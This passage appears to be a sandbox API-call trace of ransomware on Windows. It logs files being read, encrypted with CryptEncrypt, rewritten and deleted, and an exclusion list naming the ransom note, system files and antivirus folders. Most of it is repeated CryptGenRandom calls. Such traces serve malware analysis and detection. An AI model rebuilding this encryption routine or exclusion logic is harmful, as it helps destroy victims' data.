out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.005] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xf, lpOverlapped=0x0) returned 1 [0163.005] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xf, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x10) returned 1 [0163.005] GetLastError () returned 0x0 [0163.005] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x10, lpOverlapped=0x0) returned 1 [0163.005] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.005] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0x20 [0163.005] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif", dwFileAttributes=0x20) returned 0 [0163.005] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif") returned 1 [0163.005] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0 [0163.006] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif" [0163.006] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.006] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF024.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf024.tmp")) returned 0xf024 [0163.007] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF024.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf024.tmp"), dwFlags=0x1) returned 0 [0163.007] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF024.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf024.tmp")) returned 1 [0163.007] CryptDestroyKey (hKey=0x9ad838) returned 1 [0163.007] wcslen (_String="OK") returned 0x2 [0163.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.007] CryptDestroyKey (hKey=0x9ad438) returned 1 [0163.007] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0163.007] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0163.007] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.007] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*NMCRYPT") returned 0 [0163.007] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*Recovers your files.html") returned 0 [0163.007] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*.exe") returned 0 [0163.007] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*.dll") returned 0 [0163.007] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*.lnk") returned 0 [0163.007] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*.bat") returned 0 [0163.007] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*.ini") returned 1 [0163.007] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.007] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*NMCRYPT") returned 0 [0163.007] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*Recovers your files.html") returned 0 [0163.007] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*.exe") returned 0 [0163.007] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*.dll") returned 0 [0163.007] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*.lnk") returned 0 [0163.007] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*.bat") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*.ini") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*.msi") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*.scf") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*pagefile.sys*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*NTUSER.DAT*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*AppData*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\winrar\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\java\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\windows\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\ESET\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\AVG\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\AVIRA\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*Atheros*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*Realtek*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*bootmgr*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*boot*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*boot*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*CONFIG.SYS*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*IO.SYS*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*MSDOS.SYS*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*NTDETECT.COM*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*ntldr*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*chrome*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*opera*") returned 0 [0163.008] PathMatchSpecW (pszFile="Dotted_Lines.emf", pszSpec="*firefox*") returned 0 [0163.008] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf", pszSpec="*") returned 1 [0163.008] strlen (_Str="NMoreira") returned 0x8 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 